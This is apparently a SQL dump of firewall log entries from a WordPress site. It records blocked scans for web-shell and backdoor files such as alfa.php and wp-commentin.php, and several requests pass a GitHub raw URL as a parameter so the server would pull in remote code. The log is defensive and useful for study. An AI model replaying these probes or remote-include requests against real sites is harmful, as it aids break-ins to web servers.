INSERT INTO `wp_wfhits` VALUES (10768,1673819542.143535,1673819542.008400,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10769,1673819527.134879,1673819526.999100,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10770,1673819511.277404,1673819511.146700,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10771,1673819496.804904,1673819496.642700,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10772,1673820747.793657,1673820747.559300,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10773,1673820746.605850,1673820746.497800,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10774,1673820744.569451,1673820744.459300,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10775,1673820742.342204,1673820742.208300,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10776,1673820686.186710,1673820686.069300,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/css/css.php','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L3dwLWluY2x1ZGVzL2Nzcy9jc3MucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10777,1673820684.749947,1673820684.609300,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/fonts/css.php','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL2Nzcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10778,1673820683.070034,1673820682.961500,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-1ogin_bak.php','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L3dwLTFvZ2luX2Jhay5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10779,1673820681.533265,1673820681.392800,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/wp-1ogin_bak.php','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L3dwLWNvbnRlbnQvd3AtMW9naW5fYmFrLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10780,1673820679.822670,1673820679.714200,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/cindex.php','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L2NpbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10781,1673820677.519757,1673820677.402400,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfa.php','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L2FsZmEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10782,1673820676.279965,1673820676.140100,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfindex.php','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L2FsZmluZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10783,1673820670.023313,1673820669.896700,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/th3_err0r.php?php=https%3A%2F%2Fraw.githubusercontent.com%2Fcarlosdechia%2Fcarlosdechia%2Fmain%2FExV1','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L3RoM19lcnIwci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10784,1673820665.091606,1673820664.963400,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/larva.php?idb=https%3A%2F%2Fraw.githubusercontent.com%2Fcarlosdechia%2Fcarlosdechia%2Fmain%2FExV1','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L2xhcnZhLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10785,1673820658.727783,1673820658.616000,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/wpindex.php?idb=https%3A%2F%2Fraw.githubusercontent.com%2Fcarlosdechia%2Fcarlosdechia%2Fmain%2FExV1','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L3dwaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10786,1673820657.208191,1673820657.089700,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/xmlrp.php?url=https%3A%2F%2Fraw.githubusercontent.com%2Fcarlosdechia%2Fcarlosdechia%2Fmain%2FExV1','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L3htbHJwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10787,1673820653.754342,1673820653.625500,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10788,1673820649.625018,1673820649.509000,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/db_cache.php','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L3dwLWNvbnRlbnQvZGJfY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10789,1673820648.602921,1673820648.491300,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/backup_index.php','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXBfaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10790,1673820647.030949,1673820646.917900,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/boom.php?x=','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L2Jvb20ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10791,1673820644.938239,1673820644.810900,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10792,1673820643.014841,1673820642.901600,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin.php','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L2FkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10793,1673820641.478086,1673820641.351600,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90X2ZpbGVfd3AvdF9maWxlX3dwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10794,1673820639.756966,1673820639.646100,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/moduless.php','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L21vZHVsZXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10795,1673820638.180850,1673820637.842800,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/style.php','anonymousfox.co','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1JlZmVyZXJd\",\"paramValue\":\"YW5vbnltb3VzZm94LmNv\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10796,1673820498.648122,1673820498.508200,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10797,1673820491.660733,1673820491.534000,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10798,1673821091.183773,1673821091.073900,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10799,1673821088.210498,1673821088.100100,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10800,1673821085.181164,1673821085.055800,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb21tZW50aW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10801,1673821075.373996,1673821075.246700,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 